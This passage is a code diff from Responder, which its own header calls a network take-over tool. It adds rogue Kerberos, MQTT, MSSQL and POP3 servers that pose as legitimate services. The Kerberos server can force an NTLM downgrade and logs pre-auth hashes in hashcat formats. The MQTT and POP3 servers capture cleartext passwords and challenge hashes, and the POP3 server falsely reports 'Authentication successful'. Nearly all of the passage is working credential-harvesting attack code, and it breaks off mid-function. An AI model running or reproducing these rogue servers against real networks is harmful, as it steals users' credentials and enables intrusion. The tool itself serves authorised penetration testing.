+				if settings.Config.Verbose:
+					print(text('[KERB] Invalid Kerberos message'))
+				return
+			
+			if msg_type == 10:  # AS-REQ
+				# Check operation mode
+				kerberos_mode = getattr(settings.Config, 'KerberosMode', 'CAPTURE')
+				
+				# Check if client sent PA-DATA
+				has_padata, etype = find_padata_and_etype(data)
+				
+				if has_padata and etype:
+					# Client sent pre-auth data - extract the encrypted timestamp
+					etype_num, cipher_hex = extract_encrypted_timestamp(data)
+					
+					if etype_num and cipher_hex:
+						etype_name = ENCRYPTION_TYPES.get(bytes([etype_num]), 'unknown')
+						
+						if settings.Config.Verbose:
+							print(text('[KERB] AS-REQ with PA-ENC-TIMESTAMP from %s@%s (etype: %s)' % (cname, realm, etype_name)))
+						
+						# Build the hash in hashcat format
+						if etype_num == 0x17 or etype_num == 0x18:  # RC4 (23 = 0x17, 24 = 0x18)
+							if len(cipher_hex) >= 32:
+								first_16_bytes = cipher_hex[0:32]
+								rest = cipher_hex[32:]
+								flipped_hash = rest + first_16_bytes
+								hash_value = '$krb5pa$23$%s$%s$dummy$%s' % (cname, realm, flipped_hash)
+							else:
+								hash_value = '$krb5pa$23$%s$%s$dummy$%s' % (cname, realm, cipher_hex)
+								
+						elif etype_num == 0x12:  # AES256 (18) - hashcat mode 19900
+							# Format: $krb5pa$18$user$realm$cipher (hashcat computes salt internally)
+							hash_value = '$krb5pa$18$%s$%s$%s' % (cname, realm, cipher_hex)
+						elif etype_num == 0x11:  # AES128 (17) - hashcat mode 19800
+							# Format: $krb5pa$17$user$realm$cipher (hashcat computes salt internally)
+							hash_value = '$krb5pa$17$%s$%s$%s' % (cname, realm, cipher_hex)
+						else:
+							hash_value = '$krb5pa$%d$%s$%s$%s' % (etype_num, cname, realm, cipher_hex)
+						
+						# Log to database
+						SaveToDb({
+							'module': 'Kerberos',
+							'type': 'AS-REQ',
+							'client': self.client_address[0],
+							'user': cname,
+							'domain': realm,
+							'hash': hash_value,
+							'fullhash': hash_value
+						})
+						
+						# Print the hash
+						if etype_num == 0x17 or etype_num == 0x18:
+							print(color('[KERB] Kerberos Pre-Auth (hashcat -m 7500): %s' % hash_value, 3, 1))
+						elif etype_num == 0x12:
+							print(color('[KERB] Kerberos Pre-Auth (hashcat -m 19900): %s' % hash_value, 3, 1))
+						elif etype_num == 0x11:
+							print(color('[KERB] Kerberos Pre-Auth (hashcat -m 19800): %s' % hash_value, 3, 1))
+						else:
+							print(color('[KERB] Kerberos 5 AS-REQ (etype %d): %s' % (etype_num, hash_value), 3, 1))
+					else:
+						if settings.Config.Verbose:
+							print(color('[KERB] AS-REQ with PA-DATA but could not extract hash from %s@%s' % (cname, realm), 1, 1))
+				else:
+					# First AS-REQ without pre-auth
+					if kerberos_mode == 'FORCE_NTLM':
+						# Force NTLM fallback mode
+						if settings.Config.Verbose:
+							print(color('[KERB] AS-REQ from %s@%s - forcing NTLM fallback' % (cname, realm), 2, 1))
+						
+						# Build KRB-ERROR with ETYPE_NOSUPP
+						krb_error = build_krb_error_force_ntlm(realm, cname)
+						
+						# Send directly (no Record Mark for UDP)
+						socket_obj.sendto(krb_error, self.client_address)
+						
+						if settings.Config.Verbose:
+							print(color('[KERB] Sent KDC_ERR_ETYPE_NOSUPP - client should fall back to NTLM', 3, 1))
+						
+						# Log to database
+						SaveToDb({
+							'module': 'Kerberos',
+							'type': 'NTLM-Fallback-Forced',
+							'client': self.client_address[0],
+							'user': cname,
+							'domain': realm,
+							'fullhash': '%s@%s - NTLM fallback forced' % (cname, realm)
+						})
+					else:
+						# Default CAPTURE mode - send pre-auth required
+						if settings.Config.Verbose:
+							print(color('[KERB] AS-REQ from %s@%s - sending PREAUTH_REQUIRED' % (cname, realm), 2, 1))
+						
+						# Build KRB-ERROR response
+						krb_error = build_krb_error(realm, cname)
+						
+						# Send directly (no Record Mark for UDP)
+						socket_obj.sendto(krb_error, self.client_address)
+						
+						if settings.Config.Verbose:
+							print(color('[KERB] Sent KRB-ERROR (PREAUTH_REQUIRED) to %s' % self.client_address[0], 2, 1))
+			
+			elif msg_type == 12:  # TGS-REQ
+				if settings.Config.Verbose:
+					print(text('[KERB] TGS-REQ from %s@%s (ignoring)' % (cname, realm)))
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[KERB] Error: %s' % str(e)))

servers/MQTT.py

@@ -0,0 +1,205 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+from utils import settings, NetworkSendBufferPython2or3, SaveToDb
+
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
+from packets import MQTTv3v4ResponsePacket, MQTTv5ResponsePacket
+
+#Read N byte integer
+def readInt(data, offset, numberOfBytes):
+	value = int.from_bytes(data[offset:offset+numberOfBytes], 'big')
+	offset += numberOfBytes
+	return (value, offset)
+
+#Read binary data
+def readBinaryData(data, offset):
+
+	#Read number of bytes
+	length, offset = readInt(data, offset, 2)
+
+	#Read bytes
+	value = data[offset:offset+length]
+	offset += length
+
+	return (value, offset)
+
+#Same as readBinaryData() but without reading data
+def skipBinaryDataString(data, offset):
+	length, offset = readInt(data, offset, 2)
+	offset += length
+	return offset
+
+#Read UTF-8 encoded string
+def readString(data, offset):
+	value, offset = readBinaryData(data, offset)
+
+	return (value.decode('utf-8'), offset)
+
+#Read variable byte integer
+#(https://docs.oasis-open.org/mqtt/mqtt/v5.0/os/mqtt-v5.0-os.html#_Toc3901011)
+def readVariableByteInteger(data, offset):
+	multiplier = 1
+	value = 0
+	while True:
+		encodedByte = data[offset]
+		offset += 1
+
+		value = (encodedByte & 127) * multiplier
+
+		if (multiplier > 128 * 128 * 128):
+			return None
+
+		multiplier *= 128
+
+		if(encodedByte & 128 == 0):
+			break
+	
+	return (value, offset)
+
+class MqttPacket:
+
+	USERNAME_FLAG = 0x80
+	PASSWORD_FLAG = 0x40
+	WILL_FLAG = 0x04
+
+	def __init__(self, data):
+		self.__isValid = True
+
+		controllPacketType, offset = readInt(data, 0, 1)
+
+		#check if CONNECT packet type
+		if controllPacketType != 0x10:
+			self.__isValid = False
+			return
+
+		#Remaining length
+		remainingLength, offset = readVariableByteInteger(data, offset)
+
+		#Protocol name
+		protocolName, offset = readString(data, offset)
+
+		#Check protocol name
+		if protocolName != "MQTT" and protocolName != "MQIsdp":
+			self.__isValid = False
+			return
+
+		#Check protocol version
+		self.__protocolVersion, offset = readInt(data, offset, 1)
+
+		#Read connect flag register
+		connectFlags, offset = readInt(data, offset, 1)
+
+		#Read keep alive (skip)
+		offset += 2
+
+		#MQTTv5 implements properties
+		if self.__protocolVersion > 4:
+			
+			#Skip all properties
+			propertiesLength, offset = readVariableByteInteger(data, offset)
+			offset+=propertiesLength
+		
+		#Get Client ID
+		self.clientId, offset = readString(data, offset)
+
+		if (self.clientId == ""):
+			self.clientId = "<Empty>"
+
+		#Skip Will
+		if (connectFlags & self.WILL_FLAG) > 0:
+
+			#MQTT v5 implements properties
+			if self.__protocolVersion > 4:
+				willProperties, offset = readVariableByteInteger(data, offset)
+			
+			#Skip will properties
+			offset = skipBinaryDataString(data, offset)
+			offset = skipBinaryDataString(data, offset)
+	
+		#Get Username
+		if (connectFlags & self.USERNAME_FLAG) > 0:
+			self.username, offset = readString(data, offset)
+		else:
+			self.username = "<Empty>"
+
+		#Get Password
+		if (connectFlags & self.PASSWORD_FLAG) > 0:
+			self.password, offset = readString(data, offset)
+		else:
+			self.password = "<Empty>"
+
+	def isValid(self):
+		return self.__isValid
+
+	def getProtocolVersion(self):
+		return self.__protocolVersion
+
+	def data(self, client):
+
+		return {
+			'module': 'MQTT',
+			'type': 'Cleartext',
+			'client': client,
+			'hostname': self.clientId,
+			'user': self.username,
+			'cleartext': self.password,
+			'fullhash': self.username + ':' + self.password
+		}
+
+class MQTT(BaseRequestHandler):
+	def handle(self):
+
+		CONTROL_PACKET_TYPE_CONNECT = 0x10
+
+		try:
+			data = self.request.recv(2048)
+
+			#Read control packet type
+			controlPacketType, offset = readInt(data, 0, 1)
+
+			#Skip non CONNECT packets
+			if controlPacketType != CONTROL_PACKET_TYPE_CONNECT:
+				return
+			
+			#Parse connect packet
+			packet = MqttPacket(data)
+			
+			#Skip if it contains invalid data
+			if not packet.isValid():
+				#Return response
+				return
+
+			#Send response packet
+			if packet.getProtocolVersion() < 5:
+				responsePacket = MQTTv3v4ResponsePacket()
+			else:
+				responsePacket = MQTTv5ResponsePacket()
+
+			self.request.send(NetworkSendBufferPython2or3(responsePacket))
+				
+			#Save to DB
+			SaveToDb(packet.data(self.client_address[0]))
+
+
+		except Exception:
+			self.request.close()
+			pass

servers/MSSQL.py

@@ -14,11 +14,16 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from SocketServer import BaseRequestHandler
-from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
-from utils import *
 import random
 import struct
+import codecs
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
+
 
 class TDS_Login_Packet:
 	def __init__(self, data):
@@ -41,7 +46,7 @@ class TDS_Login_Packet:
 		LocaleLen         = struct.unpack('<h', data[74:76])[0]
 		DatabaseNameOff   = struct.unpack('<h', data[76:78])[0]
 		DatabaseNameLen   = struct.unpack('<h', data[78:80])[0]
-
+		data = NetworkRecvBufferPython2or3(data)
 		self.ClientName   = data[8+ClientNameOff:8+ClientNameOff+ClientNameLen*2].replace('\x00', '')
 		self.UserName     = data[8+UserNameOff:8+UserNameOff+UserNameLen*2].replace('\x00', '')
 		self.Password     = data[8+PasswordOff:8+PasswordOff+PasswordLen*2].replace('\x00', '')
@@ -52,28 +57,26 @@ class TDS_Login_Packet:
 		self.Locale       = data[8+LocaleOff:8+LocaleOff+LocaleLen*2].replace('\x00', '')
 		self.DatabaseName = data[8+DatabaseNameOff:8+DatabaseNameOff+DatabaseNameLen*2].replace('\x00', '')
 
-
 def ParseSQLHash(data, client, Challenge):
 	SSPIStart     = data[8:]
-
 	LMhashLen     = struct.unpack('<H',data[20:22])[0]
 	LMhashOffset  = struct.unpack('<H',data[24:26])[0]
-	LMHash        = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-	
+	LMHash        = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHash        = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
 	NthashLen     = struct.unpack('<H',data[30:32])[0]
 	NthashOffset  = struct.unpack('<H',data[32:34])[0]
-	NTHash        = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-	
+	NTHash        = SSPIStart[NthashOffset:NthashOffset+NthashLen]
+	NTHash        = codecs.encode(NTHash, 'hex').upper().decode('latin-1')
 	DomainLen     = struct.unpack('<H',data[36:38])[0]
 	DomainOffset  = struct.unpack('<H',data[40:42])[0]
-	Domain        = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+	Domain        = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
 	
 	UserLen       = struct.unpack('<H',data[44:46])[0]
 	UserOffset    = struct.unpack('<H',data[48:50])[0]
-	User          = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
+	User          = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
 
 	if NthashLen == 24:
-		WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, LMHash, NTHash, Challenge.encode('hex'))
+		WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, LMHash, NTHash, codecs.encode(Challenge,'hex').decode('latin-1'))
 
 		SaveToDb({
 			'module': 'MSSQL', 
@@ -85,7 +88,7 @@ def ParseSQLHash(data, client, Challenge):
 		})
 
 	if NthashLen > 60:
-		WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, Challenge.encode('hex'), NTHash[:32], NTHash[32:])
+		WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), NTHash[:32], NTHash[32:])
 		
 		SaveToDb({
 			'module': 'MSSQL', 
@@ -99,10 +102,10 @@ def ParseSQLHash(data, client, Challenge):
 
 def ParseSqlClearTxtPwd(Pwd):
 	Pwd = map(ord,Pwd.replace('\xa5',''))
-	Pw = ''
+	Pw = b''
 	for x in Pwd:
-		Pw += hex(x ^ 0xa5)[::-1][:2].replace("x", "0").decode('hex')
-	return Pw
+		Pw += codecs.decode(hex(x ^ 0xa5)[::-1][:2].replace("x", "0"), 'hex')
+	return Pw.decode('latin-1')
 
 
 def ParseClearTextSQLPass(data, client):
@@ -122,57 +125,62 @@ class MSSQL(BaseRequestHandler):
 	def handle(self):
 	
 		try:
-			data = self.request.recv(1024)
-			if settings.Config.Verbose:
-				print text("[MSSQL] Received connection from %s" % self.client_address[0])
-
-			if data[0] == "\x12":  # Pre-Login Message
-				Buffer = str(MSSQLPreLoginAnswer())
-				self.request.send(Buffer)
+			self.ntry = 0
+			while True:
 				data = self.request.recv(1024)
+				self.request.settimeout(1)
+				Challenge = RandomChallenge()
 
-			if data[0] == "\x10":  # NegoSSP
-				if re.search("NTLMSSP",data):
-                                        Challenge = RandomChallenge()
-					Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=Challenge)
-					Packet.calculate()
-					Buffer = str(Packet)
-					self.request.send(Buffer)
+				if not data:
+					break
+				if settings.Config.Verbose:
+					print(text("[MSSQL] Received connection from %s" % self.client_address[0].replace("::ffff:","")))
+				if data[0] == b"\x12" or data[0] == 18:  # Pre-Login Message
+					Buffer = str(MSSQLPreLoginAnswer())
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					data = self.request.recv(1024)
-				else:
-					ParseClearTextSQLPass(data,self.client_address[0])
 
-			if data[0] == "\x11":  # NegoSSP Auth
-				ParseSQLHash(data,self.client_address[0],Challenge)
+				if data[0] == b"\x10" or data[0] == 16:  # NegoSSP
+					if re.search(b'NTLMSSP',data):
+						Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+						Packet.calculate()
+						Buffer = str(Packet)
+						self.request.send(NetworkSendBufferPython2or3(Buffer))
+						data = self.request.recv(1024)
+					else:
+						ParseClearTextSQLPass(data,self.client_address[0])
+
+				if data[0] == b'\x11' or data[0] == 17:  # NegoSSP Auth
+					ParseSQLHash(data,self.client_address[0],Challenge)
 
 		except:
-                        pass
+			pass
 
 # MSSQL Server Browser class
 # See "[MC-SQLR]: SQL Server Resolution Protocol": https://msdn.microsoft.com/en-us/library/cc219703.aspx
 class MSSQLBrowser(BaseRequestHandler):
 	def handle(self):
 		if settings.Config.Verbose:
-			print text("[MSSQL-BROWSER] Received request from %s" % self.client_address[0])
+			print(text("[MSSQL-BROWSER] Received request from %s" % self.client_address[0]))
 
 		data, soc = self.request
 
 		if data:
-			if data[0] in "\x02\x03": # CLNT_BCAST_EX / CLNT_UCAST_EX
+			if data[0] in b'\x02\x03': # CLNT_BCAST_EX / CLNT_UCAST_EX
 				self.send_response(soc, "MSSQLSERVER")
-			elif data[0] == "\x04": # CLNT_UCAST_INST
-				self.send_response(soc, data[1:].rstrip("\x00"))
-			elif data[0] == "\x0F": # CLNT_UCAST_DAC
+			elif data[0:1] == b'\x04': # CLNT_UCAST_INST
+				self.send_response(soc, data[1:].rstrip(b"\x00"))
+			elif data[0:1] == b'\x0F': # CLNT_UCAST_DAC
 				self.send_dac_response(soc)
 
 	def send_response(self, soc, inst):
-		print text("[MSSQL-BROWSER] Sending poisoned response to %s" % self.client_address[0])
+		print(text("[MSSQL-BROWSER] Sending poisoned response to %s" % self.client_address[0]))
 
 		server_name = ''.join(chr(random.randint(ord('A'), ord('Z'))) for _ in range(random.randint(12, 20)))
 		resp = "ServerName;%s;InstanceName;%s;IsClustered;No;Version;12.00.4100.00;tcp;1433;;" % (server_name, inst)
-		soc.sendto(struct.pack("<BH", 0x05, len(resp)) + resp, self.client_address)
+		soc.sendto(struct.pack("<BH", 0x05, len(resp)) + NetworkSendBufferPython2or3(resp), self.client_address)
 
 	def send_dac_response(self, soc):
-		print text("[MSSQL-BROWSER] Sending poisoned DAC response to %s" % self.client_address[0])
+		print(text("[MSSQL-BROWSER] Sending poisoned DAC response to %s" % self.client_address[0]))
 
-		soc.sendto(struct.pack("<BHBH", 0x05, 0x06, 0x01, 1433), self.client_address)
+		soc.sendto(NetworkSendBufferPython2or3(struct.pack("<BHBH", 0x05, 0x06, 0x01, 1433)), self.client_address)

servers/POP3.py

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
+# email: lgaffie@secorizon.com
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
 # the Free Software Foundation, either version 3 of the License, or
@@ -15,34 +15,440 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from utils import *
-from SocketServer import BaseRequestHandler
-from packets import POPOKPacket
+import base64
+import hashlib
+import codecs
+import struct
+
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+from packets import POPOKPacket, POPNotOKPacket
 
-# POP3 Server class
 class POP3(BaseRequestHandler):
+	"""POP3 server with multiple authentication methods"""
+	
+	def __init__(self, *args, **kwargs):
+		self.challenge = None
+		self.username = None
+		BaseRequestHandler.__init__(self, *args, **kwargs)
+	
+	def generate_challenge(self):
+		"""Generate challenge for APOP and CRAM-MD5"""
+		import time
+		import random
+		timestamp = int(time.time())
+		random_data = random.randint(1000, 9999)
+		# APOP format: <process-id.clock@hostname>
+		self.challenge = "<%d.%d@%s>" % (random_data, timestamp, settings.Config.MachineName)
+		return self.challenge
+	
+	def send_packet(self, packet):
+		"""Send a packet to client"""
+		self.request.send(NetworkSendBufferPython2or3(packet))
+	
+	def send_ok(self, message=""):
+		"""Send +OK response"""
+		if message:
+			response = "+OK %s\r\n" % message
+		else:
+			response = "+OK\r\n"
+		self.request.send(response.encode('latin-1'))
+	
+	def send_err(self, message=""):
+		"""Send -ERR response"""
+		if message:
+			response = "-ERR %s\r\n" % message
+		else:
+			response = "-ERR\r\n"
+		self.request.send(response.encode('latin-1'))
+	
+	def send_continue(self, data=""):
+		"""Send continuation (+) response for multi-line auth"""
+		if data:
+			response = "+ %s\r\n" % data
+		else:
+			response = "+\r\n"
+		self.request.send(response.encode('latin-1'))
+	
+	def handle_apop(self, data):
+		"""Handle APOP authentication (MD5 challenge-response)"""
+		# APOP username digest
+		# digest is MD5(challenge + password)
+		try:
+			parts = data.strip().split(b' ', 2)
+			if len(parts) < 3:
+				return False
+			
+			username = parts[1].decode('latin-1')
+			digest = parts[2].decode('latin-1').lower()
+			
+			# Format for hashcat/john: username:$apop$challenge$digest
+			hash_string = "%s:$apop$%s$%s" % (username, self.challenge, digest)
+			
+			SaveToDb({
+				'module': 'POP3',
+				'type': 'APOP',
+				'client': self.client_address[0],
+				'user': username,
+				'hash': digest,
+				'fullhash': hash_string,
+			})
+			
+			if settings.Config.Verbose:
+				print(color("[*] [POP3] Captured APOP digest from %s for user %s" % (
+					self.client_address[0].replace("::ffff:", ""), username), 3, 1))
+			
+			return True
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[POP3] Error parsing APOP: %s' % str(e)))
+			return False
+	
+	def handle_auth_plain(self, data):
+		"""Handle AUTH PLAIN (base64 encoded username/password)"""
+		try:
+			# AUTH PLAIN can be sent as:
+			# AUTH PLAIN <base64>
+			# or
+			# AUTH PLAIN
+			# <base64>
+			
+			if len(data.strip().split(b' ')) > 2:
+				# Inline format
+				auth_data = data.strip().split(b' ', 2)[2]
+			else:
+				# Need to read next line
+				self.send_continue()
+				auth_data = self.request.recv(1024).strip()
+			
+			# Decode base64
+			decoded = base64.b64decode(auth_data)
+			# Format: [authzid]\x00username\x00password
+			parts = decoded.split(b'\x00')
+			
+			if len(parts) >= 3:
+				username = parts[1].decode('latin-1', errors='ignore')
+				password = parts[2].decode('latin-1', errors='ignore')
+			elif len(parts) == 2:
+				username = parts[0].decode('latin-1', errors='ignore')
+				password = parts[1].decode('latin-1', errors='ignore')
+			else:
+				return False
+			
+			SaveToDb({
+				'module': 'POP3',
+				'type': 'AUTH-PLAIN',
+				'client': self.client_address[0],
+				'user': username,
+				'cleartext': password,
+				'fullhash': username + ":" + password,
+			})
+			
+			if settings.Config.Verbose:
+				print(color("[*] [POP3] Captured AUTH PLAIN credentials from %s for user %s" % (
+					self.client_address[0].replace("::ffff:", ""), username), 2, 1))
+			
+			return True
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[POP3] Error parsing AUTH PLAIN: %s' % str(e)))
+			return False
+	
+	def handle_auth_login(self, data):
+		"""Handle AUTH LOGIN (two-stage base64 authentication)"""
+		try:
+			# AUTH LOGIN is two-stage:
+			# Client: AUTH LOGIN
+			# Server: + VXNlcm5hbWU6  (base64 "Username:")
+			# Client: <base64 username>
+			# Server: + UGFzc3dvcmQ6  (base64 "Password:")
+			# Client: <base64 password>
+			
+			# Send "Username:" prompt
+			self.send_continue(base64.b64encode(b"Username:").decode('latin-1'))
+			username_b64 = self.request.recv(1024).strip()
+			
+			if not username_b64:
+				return False
+			
+			username = base64.b64decode(username_b64).decode('latin-1', errors='ignore')
+			
+			# Send "Password:" prompt
+			self.send_continue(base64.b64encode(b"Password:").decode('latin-1'))
+			password_b64 = self.request.recv(1024).strip()
+			
+			if not password_b64:
+				return False
+			
+			password = base64.b64decode(password_b64).decode('latin-1', errors='ignore')
+			
+			SaveToDb({
+				'module': 'POP3',
+				'type': 'AUTH-LOGIN',
+				'client': self.client_address[0],
+				'user': username,
+				'cleartext': password,
+				'fullhash': username + ":" + password,
+			})
+			
+			if settings.Config.Verbose:
+				print(color("[*] [POP3] Captured AUTH LOGIN credentials from %s for user %s" % (
+					self.client_address[0].replace("::ffff:", ""), username), 2, 1))
+			
+			return True
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[POP3] Error parsing AUTH LOGIN: %s' % str(e)))
+			return False
+	
+	def handle_auth_cram_md5(self, data):
+		"""Handle AUTH CRAM-MD5 (challenge-response)"""
+		try:
+			# Generate challenge
+			import time
+			challenge = "<%d.%d@%s>" % (os.getpid(), int(time.time()), settings.Config.MachineName)
+			challenge_b64 = base64.b64encode(challenge.encode('latin-1')).decode('latin-1')
+			
+			# Send challenge
+			self.send_continue(challenge_b64)
+			
+			# Receive response
+			response_b64 = self.request.recv(1024).strip()
+			if not response_b64:
+				return False
+			
+			response = base64.b64decode(response_b64).decode('latin-1', errors='ignore')
+			# Response format: username<space>digest
+			parts = response.split(' ', 1)
+			
+			if len(parts) < 2:
+				return False
+			
+			username = parts[0]
+			digest = parts[1].lower()
+			
+			# Format for hashcat: $cram_md5$challenge$digest$username
+			hash_string = "%s:$cram_md5$%s$%s" % (username, challenge, digest)
+			
+			SaveToDb({
+				'module': 'POP3',
+				'type': 'CRAM-MD5',
+				'client': self.client_address[0],
+				'user': username,
+				'hash': digest,
+				'fullhash': hash_string,
+			})
+			
+			if settings.Config.Verbose:
+				print(color("[*] [POP3] Captured CRAM-MD5 hash from %s for user %s" % (
+					self.client_address[0].replace("::ffff:", ""), username), 3, 1))
+			
+			return True
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[POP3] Error parsing CRAM-MD5: %s' % str(e)))
+			return False
+	
+	def handle_ntlm_auth(self, data):
+		"""Handle NTLM authentication"""
+		try:
+			# Check for NTLMSSP NEGOTIATE
+			if b'NTLMSSP\x00\x01' in data:
+				# Generate NTLM challenge
+				challenge = RandomChallenge()
+				
+				# Build NTLMSSP CHALLENGE
+				ntlm_challenge = b'NTLMSSP\x00'
+				ntlm_challenge += struct.pack('<I', 2)  # Type 2
+				ntlm_challenge += struct.pack('<HHI', 0, 0, 0)  # Target name
+				ntlm_challenge += struct.pack('<I', 0x00008201)  # Flags
+				ntlm_challenge += challenge  # Server challenge
+				ntlm_challenge += b'\x00' * 8  # Reserved
+				ntlm_challenge += struct.pack('<HHI', 0, 0, 0)  # Target info
+				
+				# Send challenge (base64 encoded in continuation)
+				challenge_b64 = base64.b64encode(ntlm_challenge).decode('latin-1')
+				self.send_continue(challenge_b64)
+				
+				# Receive NTLMSSP AUTH
+				auth_b64 = self.request.recv(2048).strip()
+				if not auth_b64 or auth_b64 == b'*':
+					return False
+				
+				auth_data = base64.b64decode(auth_b64)
+				
+				# Parse NTLMSSP AUTH
+				if auth_data[0:8] != b'NTLMSSP\x00':
+					return False
+				
+				msg_type = struct.unpack('<I', auth_data[8:12])[0]
+				if msg_type != 3:
+					return False
+				
+				# Parse fields
+				lm_len = struct.unpack('<H', auth_data[12:14])[0]
+				lm_offset = struct.unpack('<I', auth_data[16:20])[0]
+				
+				ntlm_len = struct.unpack('<H', auth_data[20:22])[0]
+				ntlm_offset = struct.unpack('<I', auth_data[24:28])[0]
+				
+				domain_len = struct.unpack('<H', auth_data[28:30])[0]
+				domain_offset = struct.unpack('<I', auth_data[32:36])[0]
+				
+				user_len = struct.unpack('<H', auth_data[36:38])[0]
+				user_offset = struct.unpack('<I', auth_data[40:44])[0]
+				
+				# Extract data
+				username = auth_data[user_offset:user_offset+user_len].decode('utf-16-le', errors='ignore')
+				domain = auth_data[domain_offset:domain_offset+domain_len].decode('utf-16-le', errors='ignore')
+				lm_hash = auth_data[lm_offset:lm_offset+lm_len]
+				ntlm_hash = auth_data[ntlm_offset:ntlm_offset+ntlm_len]
+				
+				# Determine version
+				if ntlm_len == 24:
+					hash_type = "NTLMv1"
+					hash_string = "%s::%s:%s:%s:%s" % (
+						username, domain,
+						codecs.encode(lm_hash, 'hex').decode('latin-1'),
+						codecs.encode(ntlm_hash, 'hex').decode('latin-1'),
+						codecs.encode(challenge, 'hex').decode('latin-1')
+					)
+				elif ntlm_len > 24:
+					hash_type = "NTLMv2"
+					hash_string = "%s::%s:%s:%s:%s" % (
+						username, domain,
+						codecs.encode(challenge, 'hex').decode('latin-1'),
+						codecs.encode(ntlm_hash[:16], 'hex').decode('latin-1'),
+						codecs.encode(ntlm_hash[16:], 'hex').decode('latin-1')
+					)
+				else:
+					return False
+				
+				SaveToDb({
+					'module': 'POP3',
+					'type': hash_type + '-SSP',
+					'client': self.client_address[0],
+					'user': domain + '\\' + username,
+					'hash': codecs.encode(ntlm_hash, 'hex').decode('latin-1'),
+					'fullhash': hash_string,
+				})
+				
+				if settings.Config.Verbose:
+					print(color("[*] [POP3] Captured %s hash from %s for user %s\\%s" % (
+						hash_type, self.client_address[0].replace("::ffff:", ""), domain, username), 3, 1))
+				
+				return True
+			
+			return False
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[POP3] Error parsing NTLM: %s' % str(e)))
+			return False
+	
 	def SendPacketAndRead(self):
+		"""Send OK packet and read response"""
 		Packet = POPOKPacket()
-		self.request.send(str(Packet))
+		self.request.send(NetworkSendBufferPython2or3(Packet))
 		return self.request.recv(1024)
-
+	
 	def handle(self):
 		try:
-			data = self.SendPacketAndRead()
-
-			if data[0:4] == "USER":
-				User = data[5:].replace("\r\n","")
-				data = self.SendPacketAndRead()
-			if data[0:4] == "PASS":
-				Pass = data[5:].replace("\r\n","")
-
-				SaveToDb({
-					'module': 'POP3', 
-					'type': 'Cleartext', 
-					'client': self.client_address[0], 
-					'user': User, 
-					'cleartext': Pass, 
-					'fullhash': User+":"+Pass,
-				})
-			self.SendPacketAndRead()
-		except Exception:
+			# Generate challenge for APOP
+			challenge = self.generate_challenge()
+			
+			# Send banner with challenge for APOP support
+			banner = "+OK POP3 server ready %s\r\n" % challenge
+			self.request.send(banner.encode('latin-1'))
+			
+			# Read first command
+			data = self.request.recv(1024)
+			
+			# Handle CAPA (capability) command
+			if data[0:4].upper() == b'CAPA':
+				# Advertise supported auth methods
+				capabilities = [
+					"+OK Capability list follows",
+					"USER",
+					"SASL PLAIN LOGIN CRAM-MD5 NTLM",
+					"IMPLEMENTATION Responder POP3",
+					"."
+				]
+				self.request.send("\r\n".join(capabilities).encode('latin-1') + b"\r\n")
+				data = self.request.recv(1024)
+			
+			# Handle AUTH command
+			if data[0:4].upper() == b'AUTH':
+				mechanism = data[5:].strip().upper()
+				
+				if mechanism == b'PLAIN':
+					self.handle_auth_plain(data)
+					self.send_ok("Authentication successful")
+					return
+				
+				elif mechanism == b'LOGIN':
+					self.handle_auth_login(data)
+					self.send_ok("Authentication successful")
+					return
+				
+				elif mechanism == b'CRAM-MD5' or mechanism.startswith(b'CRAM'):
+					self.handle_auth_cram_md5(data)
+					self.send_ok("Authentication successful")
+					return
+				
+				elif mechanism == b'NTLM':
+					if self.handle_ntlm_auth(data):
+						self.send_ok("Authentication successful")
+					else:
+						self.send_err("Authentication failed")
+					return
+				
+				elif not mechanism:
+					# AUTH without mechanism - list supported
